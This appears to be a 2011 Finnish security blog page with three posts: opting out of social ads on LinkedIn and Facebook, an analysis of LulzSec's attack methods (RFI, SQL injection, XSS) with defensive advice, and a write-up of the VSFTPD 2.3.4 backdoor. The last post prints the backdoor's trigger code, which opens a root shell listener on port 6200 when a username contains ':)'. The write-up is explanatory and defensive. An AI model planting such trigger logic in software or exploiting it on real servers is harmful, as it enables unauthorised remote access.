Ads 468x60px

perjantai 29. heinäkuuta 2011

Minustako mannekiini?

Sattuipa tässä silmään, että myös LinkedIn-verkostoitumispalvelu mahdollistaa nykyään ”persoonallisen” mainonnan. Persoonallisella mainonnalla tarkoitan tässä yhteydessä sitä, että palvelun tarjoaja voi käyttää kuvaasi ja mahdollisesti myös muitakin tietojasi mainosten yhteydessä.

Yksityisyydensuojan kannalta asian tekee hankalaksi se, että monesti tämän tyyppiset toiminnot tulevat automaattisesti voimaan ellei käyttäjä osaa niitä itse ottaa pois käytöstä. Karrikoiden voidaan myös todeta, että palveluntarjoajat pesevät yleensä myös aiheesta kätensä; ”kerroimme tästä muutoksesta uusien käyttöehtojen sivulle 18”. Nii-in, ehkäpä kerroittekin. En vain ole sattunut lukemaan juuri tuota sivua. Ja vaikka jos olisikin, niin olisinko ymmärtänyt juristeille tarkoitettua tekstiä vieraalla kielellä… (Palveluissa pitäisi muuten olla kolmantena vaihtoehtona hyväksymisvalinta: ”hyväksyn lukematta tekstiä”. )

Palveluntarjoajan näkökulmasta uusien rahalähteiden kehittäminen on toki ymmärrettävää. Yleensähän käyttäjät haluaa ilmaista ja laadukasta palvelua. Valitettavasti palvelut eivät kuitenkaan pyöri ilmaan rahaa ja jos tarvittavaa rahaa ei kerätä käyttäjiltä, niin jostain se on otettava. Hieman arvaillen tulevaisuudessa saatamme myös nähdä paluuta vaihdantatalouteen: Peruspalvelu voi olla ilmainen mutta laajennukset maksavat. Maksutapa taasen voi olla raha tai ehkäpä se, että suostut toimimaan yrityksen mannekiinina mainoksissa.

Asiasta hieman rönsyillen: En ole selvittänyt miten businesslogiikka persoonallisten mainosten osalta toimii, mutta periaatteessa eri ihmisten suosituksen käyttäminen voisi maksaa eri hinnan mainosten ostajille. Tämä sillä, koska jos Tarja Halonen kertoo pitävänsä Maijan maito -kahvilasta tai Mikko Hyppönen mainostaa Karin Kebabia, niin vaikuttavuus on varmasti aivan eri luokkaa kuin jos joku Antti Pirinen kertoisi pitävänsä näistä. Voikin siis olla, että joskus tulevaisuudessa voimme mitata ”oman arvomme” mainosten pyyntihintojen perusteella.

Niin tai näin, jos et kuitenkaan halua (vielä) toimia mannekiinina, niin oheisten polkujen takaa löytyvät sekä LinkedInin että Facebookin asetukset, joilla voi vaikuttaa mannekiinina olemiseen:

  • LinkedIn: Settings -> Account -> Manage Social Advertising
  • Facebook: Account -> Account Settings -> Facebook Ads -> Edit third party ad settings JA Edit social ads setting


-Antti

torstai 7. heinäkuuta 2011

LulzSecin hakkerointimenetelmistä

LulzSec on yksi vuoden 2011 merkittävimmistä tietoturvailmiöistä. Lyhyen elinikänsä aikana ryhmä ehti murtautua mm. Sonyn ja Nintendon palvelimille, aiheuttaa merkittävän määrän haittaa ja saavuttaa paljon julkisuuttaa (tarkka lista LulzSecin nimiin laitetuista tietomurroista löytyy täältä).

LulzSec-juttujen lukeminen saa miettimään, mitä menetelmiä hakkerit käyttivät hyökkäysten toteuttamiseen. Tietoturvayhtiö Imperva julkaisikin hiljattain blogissaan analyysin, jossa kuvataan LulzSecin käyttämiä menetelmiä. Informaatio raporttiin on saatu Guardianin julkaisemista, LulzSecin jäsenen vuotamista IRC-lokeista.

Impervan analyysin mukaan kolme tärkeintä käytettyä hakkerointimenetelmää oli:

#1 Remote File Inclusion (RFI)
RFI-hyökkäyksessä hakkeri lataa oman tiedostonsa web-palvelimen suoritettavaksi käyttäen hyväksi web-sovelluksen syötteen käsittelyssä olevia puutteita. Tyypillisesti ladattu tiedosto on hakkerin kirjoittama skripti. IRC-lokien mukaan LulzSecc käytti RFI-haavoittuvuuden kautta boteiksi valjastettuja palvelimia hajautettujen palvelunestohyökkäysten toteuttamiseen mm. CIA:n julkista web-palvelinta vastaan.

#2 SQL-injektio (SQLi)
SQLi on web-hyökkäyksistä tunnetuin ja vaarallisin. SQLi-hyökkäyksessä käytetään hyväksi puutteita web-sovelluksen syötteenkäsittelyssä ja saadaan näin SQL-lauseita toteutettavaksi sovelluksen käyttämässä tietokannassa. IRC-lokien mukaan SQLi-hyökkäystä käytettiin ainakin Sonyn ja X-Factorin palvelimille tunkeutumisessa. Lisäksi lokeista selviää, että SQLi-hyökkäyksien toteuttamiseen on käytetty ilmaista sqlmap-työkalua, jota mekin käytämme SQLi-haavoittuvuuksien etsimiseen.

Tietoturvaorganisaatio OWASP julkaisee säännöllisesti top 10-listaa web-sovelluksen vaarallisimmista tietoturvariskeistä. Vuoden 2010 listauksessa SQLi löytyy kärkisijalta muiden injektiohaavoittuvuuksien kanssa.

#3 Cross site scripting (XSS)
XSS on toinen tunnettu ja vaarallinen web-hyökkäys. Tässä hyökkäyksessä sovellus saadaan suorittamaan hyökkääjän kirjoittamia käyttäen hyväksi puutteita sovelluksen syötteen käsittelyssä. XSS-hyökkäystä käytettiin ainakin Fox.com -verkkopalvelua vastaan. Myös XSS sijoittuu yleensä korkealle

OWASP:n vuoden 2010 top 10 -listauksessa XSS löytyy toiselta sijalta.

Mitä ylläolevista menetelmistä sitten voi päätellä? IRC-lokien mukaan LulzSec ei käyttänyt viruksia tai muita haittaohjelmia hyökkäysten toteuttamiseen. Ryhmä ei myöskään kirjoittanut hyväksikäyttökoodeja sovellustoimittajan vielä paikkaamattomiin haavoittuvuuksiin (ns. 0-day attack). Pääosa onnistuneista hyökkäyksistä tehtiin käyttäen yksinkertaisia menetelmiä ja julkisesti saatavilla olevia työkaluja. Myös hyväksikäytetyt haavoittuvuudet olivat hyvin tunnettuja web-sovellusten haavoittuvuustyyppejä, joita mekin löydämme testeissämme jatkuvasti.

Kaikki yllä mainitut haavoittuvuudet aiheutuvat puutteista sovelluksen syötteen käsittelyssä. Haavoittuvuuksien estäminen sovelluksen toteutusvaiheessa olisi yksinkertaista, mikäli tietoturva-asioihin kiinnitettäisiin enemmän huomiota jo web-sovelluksen toteutuksen yhteydessä. Eritoten seuraaviin asioihin panostamalla jo suunnitteluvaiheessa yllä käsiteltyjä hyökkäyksiä saa estettyä tehokkaasti:

#1 Syötteen käsittely
Puutteellinen syötteen käsittely on web-sovellusten yleisin ongelma, ja valitettavasti myös seurauksiltaan vakavin. Turvallisesti toteutettua syötteen käsittelyä on vaikea liittää jälkeenpäin valmiiseen sovellukseen, joten hyvä syötteenkäsittely tulisi suunnitella jo ennen implementoinnin aloittamista. Kannattaa myös yrittää välttää pyörän uudelleenkeksimistä ja käyttää alustan syötteenkäsittelymekanismeja ja/tai valmiita kolmannen osapuolen kirjastoja. Hyvä syötteen käsittelyn toteutus löytyy esim. OWASP:in ESAPI-kirjastosta.

#2 Sovelluksen lokikirjoitukset
Toinen tyypillinen web-sovelluksen puute liittyy tietoturvaan liittyvien tapahtumien lokikirjoituksiin. Tyypillisesti sovellukset eivät kirjoita riittävästi informaatiota tietoturvatapahtumista, jolloin hyökkäysten havaitseminen ja estäminen on vaikeaa. Erityisesti automaattisten hyökkäystyökalujen käyttämien aiheuttaa suuren määrän tapahtumia palvelimelle, joten toimivan lokituksen avulla hyökkäys havaittaisiin varmasti. Myöskään toimivaa lokitusta ei saa helposti liimattua valmiiseen web-sovellukseen, vaan mekanismi ja lokitettavat asiat tulee suunnitella huolella etukäteen. Toki jonkun pitää myös valvoa lokeja, jotta hyökkäykset havaittaisiin ajoissa.

tiistai 5. heinäkuuta 2011

Toinen takaovi, nyt VSFTPD:ssä

WordPress-takaovien lisäksi toinen paljon huomiota saanut takaovi on löytynyt VSFPTD-sovelluksen lähdekoodista ("Very Secure FTP Daemon"). Haavoittuvuus löytyy VSFTPD:n versiosta 2.3.4.

Julkaistun informaation mukaan takaoven laukaiseva koodi on FTP-käyttäjänimen käsittelyssä:

else if((p_str->p_buf[i]==0x3a)
&& (p_str->p_buf[i+1]==0x29))
{
  vsf_sysutil_extra();
}

Takaovi siis laukeaa, kun käyttäjänimi sisältää merkkijonon ":)". Kutsuttu funktio vsf_sysutil_extra() avaa kuuntelijan palvelimen TCP-porttiin 6200. Funktio käynnistää komentokehotteen (/bin/sh) hyökkäjän ottaessa yhteyden ko. porttiin.

Takaoven toteutus on niin yksinkertainen, että toteuttajan motiivina on ollut todennäköisesti pelkkä hauskanpito. Edistyneemmät takaovet sisältävät yleensä mekanismin, joka ilmoittaa hyökkääjälle takaoven sisältävän version käynnistämisestä. Tällöin hyökkääjän ei tarvitse skannata sokkona kaikkia maailman VSTFPD-asennuksia, vaan pelkästään odotella haavoittuvaisten sovellusten kotiinsoittoja.

Takaovi ehti olla jaettavassa paketissa ilmeisesti vain muutaman päivän ennen havaitsemista. VSFTPD on kuitenkin yleisesti käytössä oleva sovellus, joten haavoittuvaisia versioita on varmasti käytössä ympäri maailmaa.

Ko. takaovea hyväksikäyttävä moduuli on jo lisätty Metasploitiin. Sovelluksen toteuttajan tiedoksianto löytyy täältä.